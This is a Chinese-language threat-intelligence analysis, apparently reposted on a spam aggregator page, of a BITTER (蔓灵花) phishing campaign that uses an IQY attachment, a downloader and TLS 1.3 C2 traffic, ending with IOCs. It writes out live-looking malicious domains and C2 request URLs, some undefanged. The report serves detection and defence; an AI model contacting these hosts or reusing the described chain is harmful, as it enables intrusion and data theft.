当前位置: 首页 > news >正文

网站兼容问题百度超级链

网站兼容问题,百度超级链,怎么做网站推广怀化,电商搜索关键词概述2025年5月7日,蔓灵花(BITTER)组织针对巴基斯坦电信公司工作人员发起钓鱼邮件攻击,投递伪装为安全简报的恶意邮件,附件为IQY类型的Web查询文件。该文件在用户执行后通过HTTP协议获取远程CMD指令并执行,进…
  1.       概述

2025年5月7日,蔓灵花(BITTER)组织针对巴基斯坦电信公司工作人员发起钓鱼邮件攻击,投递伪装为安全简报的恶意邮件,附件为IQY类型的Web查询文件。该文件在用户执行后通过HTTP协议获取远程CMD指令并执行,进而下载User下载者vcswin.exe。vcswin.exe使用TLS 1.3协议与C2通信,先后完成系统信息上传、持久化组件gentwin.exe下载和安装,并定期发送心跳包以获取下一阶段载荷。

  • 执行过程

1 样本信息

文件名

Security Brief Report.msg

文件Hash

36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590[1]

样本类型

钓鱼邮件

原始发件IP

210.56.8.208(巴基斯坦)

钓鱼邮件的附件是后缀为iqy的Web查询文件。iqy文件是一种简单的文本文件,默认使用Microsoft Excel打开。一旦用户打开该文件,Excel会自动访问文件中的URL,获取数据。

1 钓鱼邮件执行流程

恶意附件的执行链如下所示。

  1. 打开iqy文件,通过HTTP协议从“http[:]//fogomyart.com/random.php”处获取CMD命令并执行;
  2. CMD命令通过TLS协议从“https[:]//fogomyart.com/vcswin”处下载vcswin.exe并执行;
  3. vcswin.exe通过TLS协议上传系统信息到tradesmarkets.greenadelhouse.com;
  4. vcswin.exe通过TLS协议从tradesmarkets.greenadelhouse.com处下载gentwin.exe并执行;
  5. gentwin.exe创建注册表项,实现C:\\ProgramData\\vcswin.exe自启动。
  • 加密通信分析
  1. 上线流量

vcswin.exe执行后访问URL“https[:]//tradesmarkets.greenadelhouse.com/crvtyfgvwicidnex.php”,服务器响应数据“excertvnde52bek59vecnes26o”。

2 首次GET请求

3 首次GET请求(TLS1.3解密后)

随后vcswin.exe将用户名、计算机名和操作系统版本使用字符“*”进行拼接,Base64编码后赋值给vrocean,通过GET请求发送给服务器,服务器返回“gentwinUnable to open file!”。

4 上传系统信息

5 上传系统信息(TLS1.3解密后)

2.下载流量

上传系统信息后,vcswin.exe将用户名与服务器返回数据进行拼接,继续进行GET请求,请求URL为“https[:]//tradesmarkets.greenadelhouse.com/user/用户名/gentwinUnable%20to%20open%20file!”

6 下载流量

7 下载流量(TLS1.3解密后)

vcswin.exe继续向“https://tradesmarkets.greenadelhouse.com/excerorderslistoncbook.php?vrocean=TFkqODYxNzYqKldpbmRvd3MxMEVudGVycHJpc2U=**”发送GET请求,服务器响应文件名“gentwin”。

8 获取文件名

9 获取文件名(TLS1.3解密后)

得到文件名后,vcswin.exe通过用户名拼接请求URL“https://tradesmarkets.greenadelhouse.com/user/LY/gentwin”,下载exe文件

10 下载gentwin.exe

11 下载gentwin.exe(TLS1.3解密后)

​​​​​​​3.心跳流量

下载完gentwin.exe后,vcswin.exe每隔2~3秒向服务器发送心跳包,心跳包请求URL为“https://tradesmarkets.greenadelhouse.com/excerorderslistoncbook.php?vrocean=(Base64编码的系统信息)**”。服务器会响应1字节的0x20。

12 心跳流量

13 心跳流量(TLS1.3解密后)

​​​​​​​4.数据回传

vcswin.exe还会收集程序运行目录下的文件信息拼接到URL中并通过GET请求回传给服务器。

14 回传文件列表

15 回传文件列表(TLS1.3解密后)

  • 产品检测

观成瞰云-加密威胁智能检测系统可对蔓灵花User下载者进行有效检出。

16 检测结果

  • 总结

蔓灵花User下载者延续了其多组件攻击链的一贯特点,与以往采用TLS1.2协议不同,本次攻击升级至TLS1.3协议。然而,相较于其他APT组织在协议加密外叠加内容加密的方式,蔓灵花User下载者仅依赖TLS协议本身进行加密传输。尽管通信数据经过TLS1.3协议加密,但其载荷长度特征仍可反映出明显的心跳行为。基于这一现象,通过单流载荷长度特征即可实现对该威胁的有效检测。观成科技安全研究团队将持续追踪蔓灵花组织的攻击活动,并及时更新相应的检测策略。

  • IOC

36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590

15db9daa175d506c3e1eaee339eecde8771599ed81adfac48fa99aa5c2322436

edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56

76efa1cf9fcb1015ffd7f32f43c2865539fecfae6ae87a7607fd9ccad0f63896

tradesmarkets.greenadelhouse.com

fogomyart.com

http://www.dtcms.com/a/492894.html

相关文章:

  • Media Encoder 2025 Mac Me视频音频编码处理
  • 多通道DCDC降压稳压器技术革新与卫星应用的深度探索
  • 如何制作网站网页网站建设的讲话稿
  • harry louis做受网站cms高端建站
  • 建设局网站wps2016怎么做网站
  • 网站建设在哪里个人网页设计作品纯html
  • 综合练习题
  • 【科研绘图】PGF/TikZ 生成矢量图
  • 招商加盟网站的图应该怎么做WordPress破解分享
  • Linux系统函数stat和lstat详解
  • 中文外贸网站有哪些网站开发类合同
  • 百度SEO网站wordpress的设置网址
  • 安贞网站建设公司建设网站制作哪家好
  • 二次网站开发平台购物网站开发参考文献
  • 做搜狗pc网站优化首网站中下滑菜单怎么做
  • php商城网站开发北大青鸟计算机培训学费
  • 一台会“自进化”的AI原生手机:如何撬动智能经济?
  • 外链网站有哪些华为商城官网
  • 房地产管理网站网站建设实践收获
  • 驻马店网站优化公司网站高端网站建设
  • LeetCode 2598.执行操作后的最大 MEX:哈希表统计
  • 凸函数与二阶导数
  • 企业网站界面风格设计描述网站建设管理需要招聘什么人才
  • 上林住房和城乡建设网站从网页上直接下载视频
  • 网站 上传文件专业网站运营托管
  • 本机做网站如何访问重庆网站建设公司
  • 网站开发开发需求2345浏览器打开网址
  • 网站支付宝支付接口申请账号权重查询入口站长工具
  • CSS3 多媒体查询
  • 番禺建设网站哪家好三星网上商城退款